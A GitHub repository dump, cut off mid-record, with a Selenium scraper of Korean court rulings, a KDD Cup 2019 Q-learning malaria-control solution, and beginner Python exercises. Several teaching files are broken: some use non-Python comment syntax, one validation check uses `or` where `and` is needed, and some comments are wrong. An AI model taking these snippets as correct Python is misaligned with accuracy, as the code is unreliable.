open(prev_data_fn, 'r', encoding='utf-8') as f:\n prev_data = json.load(f)['data']\n\n for prev_case in prev_data:\n prev_case_title = prev_case['title']\n prev_case_title = prev_case_title.replace(\",\", \"\")\n prev_case_title = prev_case_title.replace(\" \", \"\")\n\n if \"선고\" in prev_case_title:\n prev_case_title = prev_case_title.split(\"선고\")[1]\n if \"【\" in prev_case_title:\n prev_case_title = prev_case_title.split(\"【\")[0]\n if \":\" in prev_case_title:\n prev_case_title = prev_case_title.split(\":\")[0]\n\n prev_data_title_list.append(prev_case_title)\n\n print(\"Target Keyword : {}\".format(keyword))\n\n all_data = []\n driver = webdriver.Chrome('./chromedriver.exe') # fixed to Window OS\n wait = WebDriverWait(driver, 10)\n driver.get(\n \"https://legalsearch.kr/list/prec?cols=ALL_CONTENTS&keyword=\" + keyword + \"&court_code=400202&sort=score&pageSize=20&filter_search=true\")\n\n url = driver.find_element_by_xpath('//*[@id=\"search_result\"]/div/article/dl').find_elements_by_tag_name('a')\n\n cases = []\n prev = \"\"\n while True:\n if driver.current_url == prev:\n break\n prev = driver.current_url\n\n content = crawlCases(driver, wait, prev_data_title_list)\n cases.extend(content)\n driver.find_element_by_xpath('/html/body/div[2]/section/div/article/div[2]').find_elements_by_tag_name('a')[-1].click()\n wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/section/div/article/div[2]')))\n\n driver.quit()\n all_data.extend(cases)\n return all_data\n\n\nif __name__ == '__main__':\n keywords = 
[\"강제추행\",\"강간\",\"유사강간\",\"준강간\",\"준강제추행\",\"간음\"] # 성범죄\n # keywords = [] # 폭행\n # keywords = [] # 살인\n\n # Run Thread For each keyword\n twrv = [ThreadWithReturnValue(target=crawling, args=(keyword,)) for keyword in keywords]\n\n crawled_data = []\n for t in twrv:\n crawled_data.extend(t.join())\n\n # For Dumping - Pandas DataFrame And Excel File\n column_names = ['id', 'content']\n df_construction = []\n for idx, content in enumerate(crawled_data):\n for sentence_idx, content_line in enumerate(content.split(\"\\n\")):\n if sentence_idx == 0:\n df_construction.append([str(idx), content_line])\n elif content_line == '\\n' or content_line == ' ' or content_line == '':\n continue;\n else:\n df_construction.append(['', content_line])\n df_construction.append(['', ''])\n\n df = pd.DataFrame(df_construction, columns=column_names)\n\n to_excel_fn = \"./new_data.xlsx\"\n df.to_excel(to_excel_fn)\n"
}
] | 5 |
Sandy4321/KDD_Cup_2019_LOLS_Team
|
https://github.com/Sandy4321/KDD_Cup_2019_LOLS_Team
|
6009c9fbe858004b92add0c9fd95e7fa87b85f01
|
e5e4b0de09ec939bec683c74d4b43f9d50b9521f
|
3269c8c180a180289ca24f329fddb14783e52013
|
refs/heads/master
| 2022-04-11T05:04:10.897655 | 2019-12-23T14:55:14 | 2019-12-23T14:55:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7044335007667542,
"alphanum_fraction": 0.7758620977401733,
"avg_line_length": 27.785715103149414,
"blob_id": "31225499f74a522501a8ffd242fe66e9266300ff",
"content_id": "fd44f6bd021716dcc7c84f75719fb72e83110efc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 406,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 14,
"path": "/README.md",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "# KDD Cup 2019: LOLs team (rank 7th) final solution \n\n\nCompetition: KDD Cup 2019 Reinforcement Learning Malaria Control\n\nLink: https://compete.hexagon-ml.com/practice/rl_competition/37/\n\nSolution: Q-learning with sequences breaking \n\nThis solution got rank 7th in the competition\n\nPoster: https://github.com/bach1292/KDD_Cup_2019_LOLS_Team/blob/master/Poster.pdf\n\nPaper: http://arxiv.org/abs/1910.08926\n\n\n\n"
},
{
"alpha_fraction": 0.5100229978561401,
"alphanum_fraction": 0.5310548543930054,
"avg_line_length": 39.85234832763672,
"blob_id": "7d518dec9c409dab95bab220d63f8fee8580cef5",
"content_id": "f2080fcc801c04382eef5144cd06eb021a9f526b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6086,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 149,
"path": "/submission.py",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom collections import defaultdict\nimport random\n\n!pip3 install git+https://github.com/slremy/netsapi --user --upgrade\n\nfrom netsapi.challenge import *\nclass CustomAgent():\n \n def __init__(self, environment):\n \n #Hyperparameters\n self.env = environment\n self.epsilon = 0.9\n self.gamma = 0.9\n self.action_resolution = 0.1\n self.action_resolution_year1 = 0.3\n self.Q = defaultdict(lambda : 0.) # Q-function\n self.n = defaultdict(lambda : 1.) # number of visits\n self.actions = self.actionSpace(self.action_resolution)\n self.actionspace = range(len(self.actions)-1)\n self.policymax = []\n self.actionyear1 = self.actionSpace(self.action_resolution_year1)\n self.actionspaceyear1 = range(len(self.actionyear1)-1)\n self.memory = []\n \n \n def actionSpace(self,resolution):\n x,y = np.meshgrid(np.arange(0,1.1,resolution), np.arange(0,1.1,resolution))\n xy = np.concatenate((x.reshape(-1,1), y.reshape(-1,1)), axis=1)\n return xy.round(2).tolist()\n def exploitSpace(self,action,resolution):\n cactionspace = []\n final = []\n for i in [resolution,0,-resolution]:\n for j in [resolution,0,-resolution]:\n cactionspace.append([action[0]+j,action[1]+i])\n for a in cactionspace:\n if(a not in self.memory and a[0]<=1 and a[0]>=0 and a[1]<=1 and a[1]>=0):\n final.append(a)\n# print(\"final: \", final)\n return final\n def train(self):\n rewardmax = -999999\n policymax = []\n currentReward = 0\n Q = self.Q\n n = self.n\n gamma = self.gamma\n actions = self.actions\n actionspace = self.actionspace\n actionyear1 = self.actionyear1\n actionspaceyear1 = self.actionyear1\n currentPolicy = []\n maxactionyear1 = []\n greedy_action = lambda s : max(actionspace, key=lambda a : Q[(s,a)])\n max_q = lambda sp : max([Q[(sp,a)] for a in actionspace])\n rewardmaxyear1 = -9999\n count = 20 # 20 evaluations = 4 policies\n #find action for the first year with 20 evaluations\n for a in actionyear1:\n \n tempa = a\n count-=1\n self.env.reset()\n _,reward,_,_ = self.env.evaluateAction(tempa);\n# print(\"57: \", reward, \" \", tempa)\n self.memory.append(tempa)\n if(reward > rewardmaxyear1):\n rewardmaxyear1 = reward\n maxactionyear1 = tempa\n \n spaceExploit = self.exploitSpace(maxactionyear1,self.action_resolution)\n while(count>0):\n self.env.reset()\n nextaction = []\n direct = 0\n if(direct == 1):\n actionchoice = nextaction\n else:\n actionchoice = random.choice(spaceExploit)\n if(actionchoice not in self.memory):\n self.env.reset()\n _,reward,_,_ = self.env.evaluateAction(actionchoice)\n# print(\"74: \",reward, \" \", actionchoice)\n count-=1\n self.memory.append(actionchoice)\n direction = [actionchoice[0] - maxactionyear1[0],actionchoice[1] - maxactionyear1[1]]\n if(reward > rewardmaxyear1):\n rewardmaxyear1 = reward\n maxactionyear1 = actionchoice\n nextaction = [actionchoice[0] + direction[0],actionchoice[1] + direction[1]]\n direct =1\n if(nextaction[0] >1 or nextaction[0] <0 or nextaction[1] >1 or nextaction[1] <0):\n nextaction = [actionchoice[0] - direction[0],actionchoice[1] - direction[1]]\n spaceExploit = self.exploitSpace(nextaction,self.action_resolution)\n direct = 0\n# if(spaceExploit.index[actionchoice])\n# spaceExploit.remove(actionchoice)\n for e in range(16): #16 policies left\n epsilon = 0.8-(e/(16*1.2))\n self.env.reset()\n nextstate = self.env.state\n currentReward = 0\n currentPolicy=[]\n# print(maxactionyear1,\" \", rewardmaxyear1)\n while True:\n state = nextstate\n\n # Epsilon-Greedy Action Selection\n if epsilon > random.random() :\n action = 
random.choice(actionspace)\n else :\n action = greedy_action(state)\n n[(state,action)]+=1\n env_action = actions[action]#convert to ITN/IRS\n #print('env_action', env_action)\n if(state == 1 ):\n env_action = maxactionyear1\n nextstate, reward, done, _ = self.env.evaluateAction(env_action)\n currentReward += reward\n currentPolicy.append(env_action)\n # Q-learning\n if done :\n Q[(state,action)] = Q[(state,action)] + 1./n[(state,action)] * ( reward - Q[(state,action)] )\n if(currentReward > rewardmax):\n# print(rewardmax)\n rewardmax = currentReward\n self.policymax = currentPolicy[:]\n# print(self.policymax)\n break\n else :\n Q[(state,action)] = Q[(state,action)] + 1./n[(state,action)] * ( reward + gamma * max_q(nextstate) - Q[(state,action)] )\n\n return Q\n\n\n def generate(self):\n best_policy = None\n best_reward = -float('Inf')\n Q_trained = self.train()\n# greedy_eval = lambda s : max(self.actionspace, key=lambda a : Q_trained[(s,a)])\n# print(self.policymax)\n best_policy = {state : (self.policymax[state-1]) for state in range(1,6)}\n best_reward = self.env.evaluatePolicy(best_policy)\n \n print(best_policy, best_reward)\n \n return best_policy, best_reward"
},
{
"alpha_fraction": 0.519303560256958,
"alphanum_fraction": 0.7130961418151855,
"avg_line_length": 17.095890045166016,
"blob_id": "a10a6561a005df0b1ede22b8fc88d0b962457e82",
"content_id": "aa11e214c41053befcde6ae635e8af3f3ebc5f66",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1321,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 73,
"path": "/Requirements.txt",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "backcall==0.1.0\nbayesian-optimization==1.0.1\nbleach==2.1.3\ncertifi==2019.3.9\nchardet==3.0.4\ncolorama==0.3.9\ncycler==0.10.0\ndecorator==4.3.0\nentrypoints==0.2.3\nget==2019.4.13\nhtml5lib==1.0.1\nidna==2.8\nipykernel==4.8.2\nipython==6.3.1\nipython-genutils==0.2.0\nipywidgets==7.2.1\njedi==0.12.0\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.3\njupyter-console==5.2.0\njupyter-contrib-core==0.3.3\njupyter-contrib-nbextensions==0.5.1\njupyter-core==4.4.0\njupyter-highlight-selected-word==0.2.0\njupyter-latex-envs==1.4.6\njupyter-nbextensions-configurator==0.4.1\nkiwisolver==1.0.1\nlxml==4.3.0\nMarkupSafe==1.0\nmatplotlib==3.0.1\nmistune==0.8.3\nnbconvert==5.3.1\nnbformat==4.4.0\nnetsapi==1.2\nnltk==3.2.5\nnotebook==5.4.1\nnumpy==1.14.2\npandas==0.23.4\npandocfilters==1.4.2\nparso==0.2.0\npatsy==0.5.1\npickleshare==0.7.4\npost==2019.4.13\nprompt-toolkit==1.0.15\npublic==2019.4.13\nPygments==2.2.0\npyparsing==2.3.0\npython-dateutil==2.7.2\npytz==2018.7\npywinpty==0.5.1\nPyYAML==3.13\npyzmq==17.0.0\nqtconsole==4.3.1\nquery-string==2019.4.13\nrequest==2019.4.13\nrequests==2.21.0\nscikit-learn==0.19.1\nscipy==1.1.0\nSend2Trash==1.5.0\nsimplegeneric==0.8.1\nsix==1.11.0\nstatsmodels==0.9.0\nterminado==0.8.1\ntestpath==0.3.1\ntornado==5.0.2\ntqdm==4.28.1\ntraitlets==4.3.2\nurllib3==1.24.2\nwcwidth==0.1.7\nwebencodings==0.5.1\nwidgetsnbextension==3.2.1\n"
}
] | 3 |
ManikhweSchool/Introduction-To-Python-Programming
|
https://github.com/ManikhweSchool/Introduction-To-Python-Programming
|
d6c8b0cfc67764478c5e8fc8b5fb35e1cad5d770
|
b528a209ec575daaf345b981cbdc32a8dfc2ee59
|
f49d5e74966958bfdf4d013d826587e7839fa8fa
|
refs/heads/master
| 2023-03-11T18:58:08.779643 | 2021-02-22T03:41:28 | 2021-02-22T03:41:28 | 341,064,756 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.36538460850715637,
"alphanum_fraction": 0.4615384638309479,
"avg_line_length": 25.5,
"blob_id": "2302caafd34cc6a01a20ed7652bafd3fdcb81016",
"content_id": "11a010b7544013e2a992e699370ced3bbb8ed77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_4a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(20):\n\tprint((i+1), '---',(i+1)*(i+1))"
},
{
"alpha_fraction": 0.681073009967804,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33.35897445678711,
"blob_id": "39a552cf1830febfca025a1617f9b6a200310460",
"content_id": "2676f2e9cde0723440c244768981dd8a1c9ae237",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1342,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 39,
"path": "/Basics/Basics.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "/*\nExample 1\nRetrieve user input and display the result on the console.\nTo print several things at once, separate them by commas. \nPython will automatically insert spaces\n*/\nname = input('Enter your name')\nprint('Your Name Is', name)\nprint('A',1,'B',2)\n// Inconvenient\nprint ('The value of 1+1 is', 1+1, '.') \n// Convenient because we take advantate of the seperator.\n// We can set anything to our seperator.\nprint ('The value of 3+4 is ', 3+4, '.', sep='') \n/* In order to display strings in one line using \ntwo print statements we need to set the end argument \nto the first print.*/\nprint('On the first line ', end='')\nprint('On the same line')\n\n/*\nExample 2\nThe eval function converts the text entered \nby the user into a number. One nice feature \nof this is you can enter expressions, like \n3*12+5, and eval will compute them for you.*/\ntemp = eval(input('Enter a temperature in Celsius : '))\nprint('In Fahrenheit, that is ', 9/5*temp+32)\n\n/* Example 3*/\nnumber1 = eval(input('Enter first number : '))\nnumber2 = eval(input('Enter second number : '))\nnumber3 = eval(input('Enter third number : '))\nnumber4 = eval(input('Enter forth number : '))\nnumber5 = eval(input('Enter fifth number : '))\nsum = number1+number2+number3+number4+number5\naverage = sum/5\nprint('The Average Of Numbers Is ', average)\nprint('Sum Of All Numbers Is ', sum)\n\n\n"
},
{
"alpha_fraction": 0.6952789425849915,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 37.83333206176758,
"blob_id": "479e3a452d432eb0cd4b3bcc8953c1cab0902a49",
"content_id": "35f4f4844578bc6bacb78f505a887b4e52cbaf80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "hour = eval(input('Enter hour : '))\nhoursAhead = eval(input('How many hours ahead : '))\nnewHour = (hour+hoursAhead)%12\n\n# Back splash is a special character in python. It an escaping character.\nprint('New hour :',newHour,'o\\'clock')\n"
},
{
"alpha_fraction": 0.5816993713378906,
"alphanum_fraction": 0.6307189464569092,
"avg_line_length": 22.538461685180664,
"blob_id": "e48b6491740d14f4df53db26708e8bb590ffe51e",
"content_id": "2d6bbaab5918403da52464a03024e0414f59cf95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 13,
"path": "/For Loops/Exercises/Exercise_2_5_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "fib1 = 1\nfib2 = 1\nfib = fib1+fib2\n\nnumberOfFib = eval(input('Enter Number of Elements In The Sequence : '))\nprint(fib1,fib2,fib,sep=',',end='')\n\nfor i in range(numberOfFib-3):\n fib1 = fib2\n fib2 = fib\n fib = fib1+fib2\n print(',',fib,sep='',end='')\n# What is a user enters a number less than 3?\n"
},
{
"alpha_fraction": 0.49640288949012756,
"alphanum_fraction": 0.5377697944641113,
"avg_line_length": 24.272727966308594,
"blob_id": "dff707663825bdeb46b0dd7817d7e958941f2b00",
"content_id": "1960df42712f57a25868243de32d0ea2cfbf20bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 22,
"path": "/For Loops/Exercises/Exercise_2_5_9b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "fib1 = 1\nfib2 = 1\nfib = fib1+fib2\n\nnumberOfFib = eval(input('Enter Number of Elements In The Sequence : '))\nif numberOfFib<=0:\n print('Start Over : Invalid Input.')\n\nelif numberOfFib==1:\n print(fib1)\nelif numberOfFib==2:\n print(fib1,fib2,sep=',')\nelif numberOfFib==3:\n print(fib1,fib2,fib,sep=',',end='')\nelse:\n print(fib1,fib2,fib,sep=',',end='')\n\n for i in range(numberOfFib-3):\n fib1 = fib2\n fib2 = fib\n fib = fib1+fib2\n print(',',fib,sep='',end='')\n"
},
{
"alpha_fraction": 0.5072463750839233,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 34,
"blob_id": "ac42ce4bd3de6afcb6664d46ad3bf8c3d4941f79",
"content_id": "5ef2d5761bb81fe573ce6d0b8cb74531e1b30426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/Basics/Exercises/Exercise_1_8_6c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "x = eval(input('Enter a number:'))\nprint(x,2*x,3*x,4*x,5*x,sep='---')"
},
{
"alpha_fraction": 0.5151515007019043,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 16,
"blob_id": "f043110009d4e11b7739af325ee05538958bf7f5",
"content_id": "de8113fa43e3aa4b86312348678aadf711e7d0be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_5b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(8,92,3):\n\tprint(i)"
},
{
"alpha_fraction": 0.6411150097846985,
"alphanum_fraction": 0.6759582161903381,
"avg_line_length": 25.18181800842285,
"blob_id": "4ae76bc3f7a8f77fd8fcad9a825da236b5c27056",
"content_id": "d4ecb619c40b70e4d2570926b331ea313c06679a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/Basics/Exercises/Exercise_1_8_8b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "number1 = eval(input('Enter number1 : '))\nnumber2 = eval(input('Enter number2 : '))\nnumber3 = eval(input('Enter number3 : '))\ntotal = number1\ntotal = total + number2\ntotal = total + number3\naverage = total\naverage = average/3\n\nprint('Total =',total, end=' & ')\nprint('Average =',average)"
},
{
"alpha_fraction": 0.5581395626068115,
"alphanum_fraction": 0.6279069781303406,
"avg_line_length": 42,
"blob_id": "59f6ea9b60a08ac3f861bd076d9bb6ee7c7db05f",
"content_id": "df2be7f706a18828ff303b31c344b44fec9a6fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_3b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(2,202,2):\n\tprint((i//2), 'Lwandile Ganyile') # We perform integer division on i.\n"
},
{
"alpha_fraction": 0.6761658191680908,
"alphanum_fraction": 0.696891188621521,
"avg_line_length": 31.16666603088379,
"blob_id": "959db6ac483b4034ff9ce7c369298c63d2307f55",
"content_id": "22e8e1f86d550495379dbfc30c65bcd51f8744cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/Basics/Exercises/Exercise_1_8_9c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "mealPrice = eval(input('Enter Meal Price : '))\ntipPercent = eval(input('Enter Tip Percent : '))\n\nif mealPrice <= 0:\n\tprint('Error : Invalid Meal Price.')\nelse:\n\tif tipPercent >= 0 or tipPercent <= 100:\n\t\ttipAmount = (tipPercent/100)*mealPrice\n\t\ttotalPrice = mealPrice + tipAmount\n\t\tprint('Final Price =',totalPrice,'Tip Amount =',tipAmount)\n\telse:\n\t\tprint('Error Invalid Tip Percent.')\n"
},
{
"alpha_fraction": 0.6536144614219666,
"alphanum_fraction": 0.6777108311653137,
"avg_line_length": 40.5,
"blob_id": "1718cb7096285422beccf7534c8327f041a9cb47",
"content_id": "f6ee78a9769194a8383ac836041e812eeb8fd804",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 8,
"path": "/Numbers/Exercises/Exercise_3_8_9b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "hour = eval(input('Enter hour : '))\nhoursAhead = eval(input('How many hours ahead : '))\n\nif hour<=12 and hour>=1 and hoursAhead<=12 and hoursAhead>=1:\n # Back splash is a special character in python. It an escaping character.\n print('New hour :',(hour+hoursAhead)%12,'o\\'clock')\nelse:\n print('Error : Invalid User Input.')\n"
},
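The clock exercise is a small modular-arithmetic problem: a plain `% 12` maps every full turn to 0, which is why the corrected solution above shifts the hour down by one before the modulo and back up after. A quick check of the two formulas:

```python
# Wrap-around on a 1..12 clock: naive modulo produces 0 at full turns,
# the shift-by-one form stays inside 1..12.
for hour, ahead in [(3, 5), (11, 1), (12, 12)]:
    naive = (hour + ahead) % 12
    shifted = (hour + ahead - 1) % 12 + 1
    print(f"{hour} + {ahead}h -> naive {naive}, shifted {shifted}")
# 3 + 5h  -> naive 8, shifted 8
# 11 + 1h -> naive 0, shifted 12
# 12 + 12h -> naive 0, shifted 12
```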
{
"alpha_fraction": 0.5563910007476807,
"alphanum_fraction": 0.5939849615097046,
"avg_line_length": 18,
"blob_id": "a0c318ba0f6e9877281aaec67c955098b49e1daf",
"content_id": "5fe8f69ba77a119a12c7a651e8f9fda1a626f568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_2a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "from random import randint\nimport math\nx = randint(1,50)\ny = randint(2,5)\n\nprint('x = ',x,'\\ty = ',y,sep='')\nprint('x^y =',pow(x,y))\n"
},
{
"alpha_fraction": 0.6646706461906433,
"alphanum_fraction": 0.688622772693634,
"avg_line_length": 22.85714340209961,
"blob_id": "743e410989da444c7e9b32039369575a9108f385",
"content_id": "963f2f51592a6449599cff932c1c10348187c4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_10b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = 2**power\nlastDigits = number%100\n\nprint('Power =',power)\nprint('Number =',number)\nprint('Last Two Digits =',lastDigits)\n"
},
{
"alpha_fraction": 0.6758241653442383,
"alphanum_fraction": 0.6868131756782532,
"avg_line_length": 32.09090805053711,
"blob_id": "3808854381b586588410cbe243c7bd9594ea6414",
"content_id": "f6eef15264f6638d2ada39d4001d1c3382fae559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Numbers/Exercises/Exercise_3_8_1cb.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = pow(2,power)\nnumberOfLastDigits = eval(input('Enter number of last digits : '))\n\nif numberOfLastDigits>0:\n lastDigits = number%(pow(10,numberOfLastDigits))\n print('Power =',power)\n print('Number =',number)\n print('Last',numberOfLastDigits,'digit(s)' ,lastDigits)\nelse:\n print('Error : Invalid Input.')\n"
},
{
"alpha_fraction": 0.6933115720748901,
"alphanum_fraction": 0.7340946197509766,
"avg_line_length": 24.54166603088379,
"blob_id": "65bce326cd14a9b39f2b08095bbb819b8bf893b7",
"content_id": "dfc1d18e2fe0c349bda6938dc9c8a63f9fa7aa7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 613,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 24,
"path": "/Numbers/Numbers.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "# Generating a random integer between 1 and 10 inclusively.\nfrom random import randint\nx = randint(1,10)\nprint('A random number between 1 and 10: ', x)\nprint()\n\n# The following methods do not require importing the math module.\nprint(abs(-4.3))\nprint(round(3.336, 2))\nprint(round(345.2, -1))\n\n# Trigonometry Functions\nfrom math import sin, pi\nprint('Pi is roughly', pi)\nprint('sin(90) =', sin(90))\n\n\n# Getting help on the math module type the following lines.\nimport math\ndir(math)\n# To Get Help On A Specific Method Type The Following.\nhelp(math.pow)\n\nfrom math import* # Imports everything from the math module.\n"
},
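Two details from Numbers.py that often trip people up: `randint` is inclusive on both ends (unlike `range`), and `math.pow` always returns a float while the `**` operator keeps integers exact. A short sketch:

```python
import math
from random import randint

# randint(1, 6) can return 6; range(1, 6) never reaches it.
print([randint(1, 6) for _ in range(5)])

# math.pow works in floats; ** preserves the int type.
print(math.pow(2, 10), 2 ** 10)  # 1024.0 1024
```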
{
"alpha_fraction": 0.52173912525177,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 22,
"blob_id": "7df94f4269bfe9c90701f2a0a63a50f2ff4d93f0",
"content_id": "5173b24b95158f942c5efa42d584646fba4c4b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_2b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for j in range(50):\n print('Lwandile '*18)\n"
},
{
"alpha_fraction": 0.5978260636329651,
"alphanum_fraction": 0.6195651888847351,
"avg_line_length": 22,
"blob_id": "56d833ccd6a53208ebe96f4b91959865977bd1d5",
"content_id": "77c807b164e4f585e18bd1e7d1281905b064b5e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/For Loops/Exercises/Exercise_2_5_13a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "rows = eval(input('Enter number of rows : '))\n\nfor row in range(rows,0,-1):\n\tprint('*'*row)\n"
},
{
"alpha_fraction": 0.7727272510528564,
"alphanum_fraction": 0.7863636612892151,
"avg_line_length": 54,
"blob_id": "36757a6e815e0060fd7d29c2149ee6c1517a9776",
"content_id": "e6c4ae011f7147434e1d154b112c63a8bef492b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 4,
"path": "/Basics/Exercises/Exercise_1_8_7c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : '))\nweightInPounds = weightInKilograms*2.2\nprint('Without Rounding Of',weightInPounds)\nprint('There are',round(weightInPounds,2),'pounds in',weightInKilograms,'kilograms.')\n"
},
{
"alpha_fraction": 0.5822580456733704,
"alphanum_fraction": 0.6403225660324097,
"avg_line_length": 21.178571701049805,
"blob_id": "de9e071f52bf6e007275ba8b8f23334fb857582f",
"content_id": "47d0df97dd9b54b1b1b45d267a464a6f4284fc55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 28,
"path": "/For Loops/For_Loops.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "// Print Hello Ten Times.\nfor i in range(10):\n\tprint('Hello')\n\t\n// Retrieve User Input Ten Times.\nfor i in range(3):\n\tnum = eval(input('Enter a number: '))\n\tprint ('The square of your number is', num*num)\nprint('The loop is now done.')\n\n// The Sum Of The First Ten Numbers.\nsum = 0\nfor index in range(10):\n\tsum += index\nprint(sum)\n\n// Playing with the range function.\nfor index in range(5,11):\n\tprint(index,end='',sep=' ')\nprint()\n// Print numbers from 10 to 100 (10, 20, 30,...)\nfor i in range(10,110,10):\n\tprint(i,end=' ')\nprint()\n// Print numbers from 10, 8, 7,...0\nfor i in range(10,-2,-2):\n\tprint(i,end=' ')\nprint()"
},
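The range() patterns used in For_Loops.py, made visible by materializing each one into a list; note that the stop value itself is never produced:

```python
print(list(range(5, 11)))        # [5, 6, 7, 8, 9, 10]
print(list(range(10, 110, 10)))  # [10, 20, 30, ..., 100]
print(list(range(10, -2, -2)))   # [10, 8, 6, 4, 2, 0]
```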
{
"alpha_fraction": 0.6511628031730652,
